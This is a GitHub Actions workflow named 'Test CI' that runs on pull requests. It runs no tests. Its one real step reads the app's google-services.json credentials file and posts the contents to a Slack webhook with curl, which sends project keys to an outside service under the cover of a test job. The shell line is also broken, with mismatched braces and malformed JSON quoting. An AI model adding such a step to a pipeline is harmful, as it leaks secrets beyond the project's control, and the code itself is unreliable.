name: Test CI

on:
  pull_request:
    branches:
      - master


jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v2

      - name: Send Google service file to slack
        run: |
          # read google service file and send to slack
          google_service="$(cat ${app/google-services.json)"
          curl -X POST -H 'Content-type: application/json' --data '{"text": \`\`\`${google_service}\`\`\`\"}' ${{ secrets.SLACK_WEBHOOK_URL }}

